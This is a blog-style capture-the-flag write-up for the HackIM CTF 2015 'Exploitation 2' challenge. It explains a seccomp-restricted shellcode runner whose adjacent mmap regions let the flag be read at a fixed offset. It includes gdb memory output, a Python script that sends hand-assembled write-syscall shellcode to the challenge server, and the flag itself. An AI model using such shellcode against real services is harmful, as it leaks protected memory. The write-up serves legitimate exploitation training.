Friday, January 16, 2015

HACKIM CTF 2015 - Exploitation 2

The binary makes 2 mmap() calls. One region is RWX into which user supplied shellcode is copied and executed. Flag is copied into other region. Then seccomp is used to restrict syscalls that we could make. The white list includes read, write, exit and exit_group syscalls. In current Linux ASLR, two mmap'ed region will be placed adjacent to each other. Knowing the address of one region, we could compute the address of other as the offsets are fixed. This is what the memory looks like
gdb-peda$ vmmap 
Start      End        Perm Name
0xf7fd6000 0xf7fd8000 rwxp mapped
0xf7fd8000 0xf7fdb000 rw-p mapped
gdb-peda$ x/s 0xf7fd8000
0xf7fd8000: "thisisaflag" 
So we need a shellcode to write the flag to stdout from a known offset. Below is the solution:
#!/usr/bin/env python

import socket

ip = "127.0.0.1"
ip = "54.163.248.69"
port = 9001

soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.connect((ip, port))

# nasm > mov eax, 0x4
# 00000000  B804000000        mov eax,0x4
# nasm > mov ebx, 0x1
# 00000000  BB01000000        mov ebx,0x1
# nasm > lea ecx, [ecx+0x2000]
# 00000000  8D8900200000      lea ecx,[ecx+0x2000]
# nasm > mov edx, 0x100
# 00000000  BA00010000        mov edx,0x100
# nasm > int 0x80
# 00000000  CD80              int 0x80

payload  = 'B804000000BB010000008D8900200000BA00010000CD80'.decode('hex') 

soc.send(payload + chr(0xa))
print soc.recv(0x100)
Flag for the challenge is d3sp3r4t3_sh3llc0d3

No comments :

Post a Comment